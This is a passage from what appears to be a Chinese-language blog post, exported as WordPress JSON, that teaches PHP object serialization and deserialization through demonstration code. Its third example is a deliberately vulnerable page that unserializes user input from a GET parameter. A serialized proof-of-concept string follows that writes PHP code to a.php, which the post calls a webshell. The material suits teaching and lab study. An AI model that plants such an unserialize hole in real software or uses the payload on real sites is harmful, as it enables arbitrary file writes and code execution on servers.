\uff01\\n";\n\t}\n\tpublic function __call($name, $arguments){\n\t\techo"__caLL\uff1a\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\\n";\n\t}\n\tpublic function __toString(){\n\t\treturn "__toString\uff1a\u628a\u5bf9\u8c61\u5f53\u505a\u5b57\u7b26\u4e32\u8f93\u51fa\u65f6 \\n";\n\t}\n\tpublic function __clone(){\n\t\techo "__clone\uff1a\u514b\u9686\u5bf9\u8c61\u65f6 \\n";\n\t}\n\tpublic function __get($name){\n\t\techo "__get\uff1a\u8bfb\u53d6\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u65f6 \\n";\n\t}\n\tpublic function _set($name,$value){\n\t\techo "__set\uff1a\u8bbe\u7f6e\u4e0d\u5b58\u5728\u7684\u5c5e\u6027 \\n";\n\t}\n\tpublic function __isset($name){\n\t\techo "__isset\uff1a\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528isset\uff08\uff09 \\n";\n\t}\n\tpublic function _unset($name){\n\t\techo "__unset\uff1a\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset\uff08\uff09\\n";\n\t}\n\tpublic function hello(){\n\t\techo "My name is $this->name !\\n";\n\t}\n}\n$ryan = new Girl("Ryan");\n$ryan->hello();\n$ryan->a();\n$ryan->b;\n$r2 = clone $ryan;\necho $ryan;\n$r2->name = "zs";\n$r2->abc ="zs";\nisset($r2->abc);\nunset($r2->a);\n?>\n<\/code><\/pre>\n<\/p>\n
\u6848\u4f8b2.\uff1a<\/h2>\n<?php\nheader("content-type:text\/html;charset=utf-8");\nclass Girl{\n\tpublic $name = "\u5c0f\u82b1";\n\tpublic function __construct($name){\n\t\t$this->name = $name;\n\t\techo "__construct\uff1a \u521b\u5efa\u5bf9\u8c61\u65f6\uff0c create object:$this->name \\n";\n\t}\n\tpublic function __sleep(){\n\t\techo "__sleep\uff1a\u5e8f\u5217\u5316\u65f6\u8c03\u7528\\n";\n\t\treturn array('name');\n\t}\n\tpublic function __wakeup(){\n\t\techo "__wakeup\uff1a\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528\\n";\n\t}\n}\n$ryan = new Girl("Ryan");\n$r = serialize($ryan);\necho $r;\n$str ='O:4:"Girl":1:{s:4:"name";s:4:"Ryan";}';\necho "\\n";\nunserialize($str);\n?>\n<\/code><\/pre>\n<\/p>\n
\u6848\u4f8b3.\uff1a<\/h2>\n<?php\nheader("content-type:text\/html;charset=utf-8");\nhighlight_file(__FILE__);\nclass Girl{\n\tpublic $name = "\u5c0f\u660e";\n\tpublic $file = "a.txt";\n\tfunction __wakeup(){\n\t\t\t$file = fopen($this->file,'w');\n\t\t\tfwrite($file, $this->name);\n\t\t\tfclose($file);\n\t}\n}\necho "<h1>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u6848\u4f8b<\/h1>";\nif(isset($_GET["str"])){\n\t$str = $_GET['str'];\n\t$o = unserialize($str);\n\techo "name:".$o->name;\n}\n?>\n<\/code><\/pre>\npoc\u5199\u5165webshell:<\/p>\n
O:4:"Girl":2:{s:4:"name";s:18:"<?php phpinfo();?>";s:4:"file";s:5:"a.php";}\n<\/code><\/pre>\n\u6267\u884cpoc\uff1a
\n<\/p>\n
\u8bbf\u95eea.php\u6587\u4ef6\uff1a
\n
<\/div>
\n\u6210\u529f\u5199\u5165<\/p>\n","protected":false},"excerpt":{"rendered":"\u4e00\u3001\u5e8f\u5217\u5316\/\u53cd\u5e8f\u5217\u5316\u6280\u672f \u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u8f6c\u4e3a\u5b57\u8282\u6d41\uff0c\u76ee\u7684\u662f\u65b9\u4fbf\u5bf9\u8c61\u5728\u5185\u5b58\u3001\u6587\u4ef6\u3001\u6570\u636e\u5e93\u6216\u8005\u7f51\u7edc\u4e4b\u95f4\u7684\u4f20\u9012 \u53cd\u5e8f […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,21],"tags":[],"class_list":["post-2144","post","type-post","status-publish","format-standard","hentry","category-web","category-21"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2144"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144\/revisions"}],"predecessor-version":[{"id":2145,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144\/revisions\/2145"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2144"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323175056.png\")
<\/div>